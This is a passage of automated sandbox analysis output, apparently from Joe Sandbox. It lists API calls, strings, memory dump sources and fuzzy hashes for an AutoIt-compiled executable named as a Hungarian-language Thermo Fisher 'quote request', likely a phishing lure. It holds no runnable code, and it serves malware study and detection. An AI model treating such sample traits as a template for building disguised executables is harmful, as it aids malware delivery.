                                                              • LoadResource.KERNEL32(?,00000000,?,?,0060449E,?,?,00000000,00000001,?,?,?,?,?,?,006041FB), ref: 00674F1A
                                                              • SizeofResource.KERNEL32(?,00000000,?,?,0060449E,?,?,00000000,00000001,?,?,?,?,?,?,006041FB), ref: 00674F2F
                                                              • LockResource.KERNEL32(0060449E,?,?,0060449E,?,?,00000000,00000001,?,?,?,?,?,?,006041FB,00000000), ref: 00674F42
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                              • String ID: SCRIPT
                                                              • API String ID: 3051347437-3967369404
                                                              • Opcode ID: bff0808c8127e0478b470f64fa25dfc7f4255cd857d004618fbac148601d23d0
                                                              • Instruction ID: f833ddc6e24a18ee1ac0a931f3da11dc19ccaf5f75a7f41d8a75f4852336c7ab
                                                              • Opcode Fuzzy Hash: bff0808c8127e0478b470f64fa25dfc7f4255cd857d004618fbac148601d23d0
                                                              • Instruction Fuzzy Hash: 8D111CB1240701BFE7259B65EC48F677BBAEFC9B55F10416CF60296290DB61DD008A30
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throwstd::exception::exception
                                                              • String ID: @$ l$ l$ l
                                                              • API String ID: 3728558374-2045459291
                                                              • Opcode ID: ae751a14e37458cb165c459b5925efb2b289296705cdde9782061fc89153c3b5
                                                              • Instruction ID: c140c3e2ba39ee4f9bd99effb33889678fb8c47ea9159ad120edd2f1b669158a
                                                              • Opcode Fuzzy Hash: ae751a14e37458cb165c459b5925efb2b289296705cdde9782061fc89153c3b5
                                                              • Instruction Fuzzy Hash: 4B728E70E042159FCF14DF94C481AEEB7B7EF48310F18805AE91AAB351DB35AE86CB95
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00672F49), ref: 00646CB9
                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00646CCA
                                                              • FindClose.KERNEL32(00000000), ref: 00646CDA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: FileFind$AttributesCloseFirst
                                                              • String ID:
                                                              • API String ID: 48322524-0
                                                              • Opcode ID: fbdba58237d7bf2c1328262b88e2ee1c5d50287d48d35e387b8e530dc28f9f78
                                                              • Instruction ID: e551771f6d1392e0c47d364122c4a871421a3b24543c3baa671f46631d46e886
                                                              • Opcode Fuzzy Hash: fbdba58237d7bf2c1328262b88e2ee1c5d50287d48d35e387b8e530dc28f9f78
                                                              • Instruction Fuzzy Hash: EEE048318145156783106738EC4D8E9776EDF06339F104715F5B5C12D0E7B0D94446E6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: l
                                                              • API String ID: 3964851224-900832589
                                                              • Opcode ID: 25baeb5f2a7822aebc2ace86819ce9b628cef515e562293f3990d6da2f96e268
                                                              • Instruction ID: 078d8c1b31f8487db36a42d084218729fd5a3bbaab905c6574dd2bc5176bc345
                                                              • Opcode Fuzzy Hash: 25baeb5f2a7822aebc2ace86819ce9b628cef515e562293f3990d6da2f96e268
                                                              • Instruction Fuzzy Hash: 2F928D70608351DFD764DF18C484BAAB7E2BF84304F18885DE99A8B392D771ED85CB92
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0060E959
                                                              • timeGetTime.WINMM ref: 0060EBFA
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0060ED2E
                                                              • TranslateMessage.USER32(?), ref: 0060ED3F
                                                              • DispatchMessageW.USER32(?), ref: 0060ED4A
                                                              • LockWindowUpdate.USER32(00000000), ref: 0060ED79
                                                              • DestroyWindow.USER32 ref: 0060ED85
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0060ED9F
                                                              • Sleep.KERNEL32(0000000A), ref: 00675270
                                                              • TranslateMessage.USER32(?), ref: 006759F7
                                                              • DispatchMessageW.USER32(?), ref: 00675A05
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00675A19
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                              • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                              • API String ID: 2641332412-570651680
                                                              • Opcode ID: ae98628a022751736c800de2757dd27e4cc6952f5bb2470ecd96eb11eb06766e
                                                              • Instruction ID: 055aa573b454fc9694a82aa0ead741b893eb10af4b28cc1d39c3622952f8b84f
                                                              • Opcode Fuzzy Hash: ae98628a022751736c800de2757dd27e4cc6952f5bb2470ecd96eb11eb06766e
                                                              • Instruction Fuzzy Hash: 6C62D1705443509FEB68DF24C895BAB77E7BF44300F0849ADE94A8B2D2DBB2D844CB52
                                                              APIs
                                                              • ___createFile.LIBCMT ref: 00635EC3
                                                              • ___createFile.LIBCMT ref: 00635F04
                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00635F2D
                                                              • __dosmaperr.LIBCMT ref: 00635F34
                                                              • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00635F47
                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00635F6A
                                                              • __dosmaperr.LIBCMT ref: 00635F73
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00635F7C
                                                              • __set_osfhnd.LIBCMT ref: 00635FAC
                                                              • __lseeki64_nolock.LIBCMT ref: 00636016
                                                              • __close_nolock.LIBCMT ref: 0063603C
                                                              • __chsize_nolock.LIBCMT ref: 0063606C
                                                              • __lseeki64_nolock.LIBCMT ref: 0063607E
                                                              • __lseeki64_nolock.LIBCMT ref: 00636176
                                                              • __lseeki64_nolock.LIBCMT ref: 0063618B
                                                              • __close_nolock.LIBCMT ref: 006361EB
                                                                • Part of subcall function 0062EA9C: CloseHandle.KERNELBASE(00000000,006AEEF4,00000000,?,00636041,006AEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0062EAEC
                                                                • Part of subcall function 0062EA9C: GetLastError.KERNEL32(?,00636041,006AEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0062EAF6
                                                                • Part of subcall function 0062EA9C: __free_osfhnd.LIBCMT ref: 0062EB03
                                                                • Part of subcall function 0062EA9C: __dosmaperr.LIBCMT ref: 0062EB25
                                                                • Part of subcall function 00627C0E: __getptd_noexit.LIBCMT ref: 00627C0E
                                                              • __lseeki64_nolock.LIBCMT ref: 0063620D
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00636342
                                                              • ___createFile.LIBCMT ref: 00636361
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0063636E
                                                              • __dosmaperr.LIBCMT ref: 00636375
                                                              • __free_osfhnd.LIBCMT ref: 00636395
                                                              • __invoke_watson.LIBCMT ref: 006363C3
                                                              • __wsopen_helper.LIBCMT ref: 006363DD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                              • String ID: @
                                                              • API String ID: 3896587723-2766056989
                                                              • Opcode ID: 02d493786cc2a23a2000741d55f2d60f5fae2b34a4edd446f129aa4d938e8c8a
                                                              • Instruction ID: ce5cee5db2888c51eab3734b2c2acfe085728ba29a03fa438a46054327d1fa71
                                                              • Opcode Fuzzy Hash: 02d493786cc2a23a2000741d55f2d60f5fae2b34a4edd446f129aa4d938e8c8a
                                                              • Instruction Fuzzy Hash: 5022E271904A0AABEB299F68DC45BED7B63EF00314F248229F5229B3D1C3358D51CBD5

                                                              Control-flow Graph

                                                              APIs
                                                              • _wcscpy.LIBCMT ref: 0064FA96
                                                              • _wcschr.LIBCMT ref: 0064FAA4
                                                              • _wcscpy.LIBCMT ref: 0064FABB
                                                              • _wcscat.LIBCMT ref: 0064FACA
                                                              • _wcscat.LIBCMT ref: 0064FAE8
                                                              • _wcscpy.LIBCMT ref: 0064FB09
                                                              • __wsplitpath.LIBCMT ref: 0064FBE6
                                                              • _wcscpy.LIBCMT ref: 0064FC0B
                                                              • _wcscpy.LIBCMT ref: 0064FC1D
                                                              • _wcscpy.LIBCMT ref: 0064FC32
                                                              • _wcscat.LIBCMT ref: 0064FC47
                                                              • _wcscat.LIBCMT ref: 0064FC59
                                                              • _wcscat.LIBCMT ref: 0064FC6E
                                                                • Part of subcall function 0064BFA4: _wcscmp.LIBCMT ref: 0064C03E
                                                                • Part of subcall function 0064BFA4: __wsplitpath.LIBCMT ref: 0064C083
                                                                • Part of subcall function 0064BFA4: _wcscpy.LIBCMT ref: 0064C096
                                                                • Part of subcall function 0064BFA4: _wcscat.LIBCMT ref: 0064C0A9
                                                                • Part of subcall function 0064BFA4: __wsplitpath.LIBCMT ref: 0064C0CE
                                                                • Part of subcall function 0064BFA4: _wcscat.LIBCMT ref: 0064C0E4
                                                                • Part of subcall function 0064BFA4: _wcscat.LIBCMT ref: 0064C0F7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                              • String ID: >>>AUTOIT SCRIPT<<<$t2k
                                                              • API String ID: 2955681530-1443425849
                                                              • Opcode ID: 5f0a18bb977ce2e637bbe8f977073772248fa612e63754f3e786ed61083c7d08
                                                              • Instruction ID: ccb3f12d4085684cf5ba258a8228c19584d95b57945b9a534ac961f9e3f9ad03
                                                              • Opcode Fuzzy Hash: 5f0a18bb977ce2e637bbe8f977073772248fa612e63754f3e786ed61083c7d08
                                                              • Instruction Fuzzy Hash: DD91A171604705AFDB64EB54C891E9BB3EAFF84300F04486DF98997292DB30EA44CF96

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00603F86
                                                              • RegisterClassExW.USER32(00000030), ref: 00603FB0
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00603FC1
                                                              • InitCommonControlsEx.COMCTL32(?), ref: 00603FDE
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00603FEE
                                                              • LoadIconW.USER32(000000A9), ref: 00604004
                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00604013
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                              • API String ID: 2914291525-1005189915
                                                              • Opcode ID: 7d1e6f6fce2be5e38c5dce0ce7066c3ad90687c1e93b0a93d3efe5faa4a5f138
                                                              • Instruction ID: 3b0e207726acf3b2cac9472e52881e909cf92d5dad7313a0e937f6c84937ebf6
                                                              • Opcode Fuzzy Hash: 7d1e6f6fce2be5e38c5dce0ce7066c3ad90687c1e93b0a93d3efe5faa4a5f138
                                                              • Instruction Fuzzy Hash: 8921D8B5D00319AFDB00EFA5EC89BDDBBB6FB0A710F10521AF511AA2A0D7B54544CFA1

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0064BDB4: __time64.LIBCMT ref: 0064BDBE
                                                                • Part of subcall function 00604517: _fseek.LIBCMT ref: 0060452F
                                                              • __wsplitpath.LIBCMT ref: 0064C083
                                                                • Part of subcall function 00621DFC: __wsplitpath_helper.LIBCMT ref: 00621E3C
                                                              • _wcscpy.LIBCMT ref: 0064C096
                                                              • _wcscat.LIBCMT ref: 0064C0A9
                                                              • __wsplitpath.LIBCMT ref: 0064C0CE
                                                              • _wcscat.LIBCMT ref: 0064C0E4
                                                              • _wcscat.LIBCMT ref: 0064C0F7
                                                              • _wcscmp.LIBCMT ref: 0064C03E
                                                                • Part of subcall function 0064C56D: _wcscmp.LIBCMT ref: 0064C65D
                                                                • Part of subcall function 0064C56D: _wcscmp.LIBCMT ref: 0064C670
                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0064C2A1
                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0064C338
                                                              • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0064C34E
                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0064C35F
                                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0064C371
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                              • String ID:
                                                              • API String ID: 2378138488-0
                                                              • Opcode ID: 548ddf0f6b40c740c43677ddcaf708efdcb515c80657c6c97a63f93c19e6563f
                                                              • Instruction ID: 39f17d952d00a7c18bd879ea20b6da22ab375551af1b270e76268bd8d88752fa
                                                              • Opcode Fuzzy Hash: 548ddf0f6b40c740c43677ddcaf708efdcb515c80657c6c97a63f93c19e6563f
                                                              • Instruction Fuzzy Hash: FBC13DB1E00129ABDF65DF95CC81EDEB7BEEF49310F0040AAF609E6251DB709A448F65

                                                              Control-flow Graph

                                                              APIs
                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 006037B3
                                                              • KillTimer.USER32(?,00000001), ref: 006037DD
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00603800
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0060380B
                                                              • CreatePopupMenu.USER32 ref: 0060381F
                                                              • PostQuitMessage.USER32(00000000), ref: 0060382E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                              • String ID: TaskbarCreated
                                                              • API String ID: 129472671-2362178303
                                                              • Opcode ID: 563e2afb23a30567fd1f6a21078f1d1f8ce526792084d585204b14e060a89b9b
                                                              • Instruction ID: af87666e35149b1f1d320bc9fb5039a327568b5b74004ed50dfed46eb0473e45
                                                              • Opcode Fuzzy Hash: 563e2afb23a30567fd1f6a21078f1d1f8ce526792084d585204b14e060a89b9b
                                                              • Instruction Fuzzy Hash: 2F4136F028016AABCB185F289C4AFBB365FFB42302F040519F9029A3D2DB61CE518779

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00603E79
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00603E88
                                                              • LoadIconW.USER32(00000063), ref: 00603E9E
                                                              • LoadIconW.USER32(000000A4), ref: 00603EB0
                                                              • LoadIconW.USER32(000000A2), ref: 00603EC2
                                                                • Part of subcall function 00604024: LoadImageW.USER32(00600000,00000063,00000001,00000010,00000010,00000000), ref: 00604048
                                                              • RegisterClassExW.USER32(?), ref: 00603F30
                                                                • Part of subcall function 00603F53: GetSysColorBrush.USER32(0000000F), ref: 00603F86
                                                                • Part of subcall function 00603F53: RegisterClassExW.USER32(00000030), ref: 00603FB0
                                                                • Part of subcall function 00603F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00603FC1
                                                                • Part of subcall function 00603F53: InitCommonControlsEx.COMCTL32(?), ref: 00603FDE
                                                                • Part of subcall function 00603F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00603FEE
                                                                • Part of subcall function 00603F53: LoadIconW.USER32(000000A9), ref: 00604004
                                                                • Part of subcall function 00603F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00604013
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                              • String ID: #$0$AutoIt v3
                                                              • API String ID: 423443420-4155596026
                                                              • Opcode ID: bc5adb6d52b74679a74ef8be3ff15ffe92bd8b9511467f8b5eed49873f4fdd38
                                                              • Instruction ID: df0742b7f9de27cd12a0875478c2f51d1485b29f7883b0197968ef36e0063932
                                                              • Opcode Fuzzy Hash: bc5adb6d52b74679a74ef8be3ff15ffe92bd8b9511467f8b5eed49873f4fdd38
                                                              • Instruction Fuzzy Hash: 2A2153B0E00304AFCB04DFA9EC45EA9BFF7FB4A310F14522AE204A63A1D77585508F91

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00D4C6D9
                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D4C8FF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063598102.0000000000D49000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D49000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d49000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CreateFileFreeVirtual
                                                              • String ID:
                                                              • API String ID: 204039940-0
                                                              • Opcode ID: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                              • Instruction ID: c5151ab24c9fc64e285868e5d8ef1d736f571084ad01c091168b3c40b3f16245
                                                              • Opcode Fuzzy Hash: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                              • Instruction Fuzzy Hash: 41A11574E11209EBDB54CFA4C898BEEBBB5FF48304F249159E501BB280D7759A81CFA4

                                                              Control-flow Graph

                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00604A1D
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 006741DB
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0067421A
                                                              • RegCloseKey.ADVAPI32(?), ref: 00674249
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$CloseOpen
                                                              • String ID: Include$Software\AutoIt v3\AutoIt
                                                              • API String ID: 1586453840-614718249
                                                              • Opcode ID: 4bf609a27f67a9586f83c62814b2b0f21d3855eb648abcff4b7ad4b9972cf9fe
                                                              • Instruction ID: 0a87fec3c3401483d179af0aa810aae85ec47a469d49c30283cfabd4312275a7
                                                              • Opcode Fuzzy Hash: 4bf609a27f67a9586f83c62814b2b0f21d3855eb648abcff4b7ad4b9972cf9fe
                                                              • Instruction Fuzzy Hash: DD116DB1640109BEEB14ABA4CD86DFF7BADEF08344F005068B506D6191EF709E01D764

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006036E6
                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00603707
                                                              • ShowWindow.USER32(00000000,?,?,?,?,00603AA3,?), ref: 0060371B
                                                              • ShowWindow.USER32(00000000,?,?,?,?,00603AA3,?), ref: 00603724
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
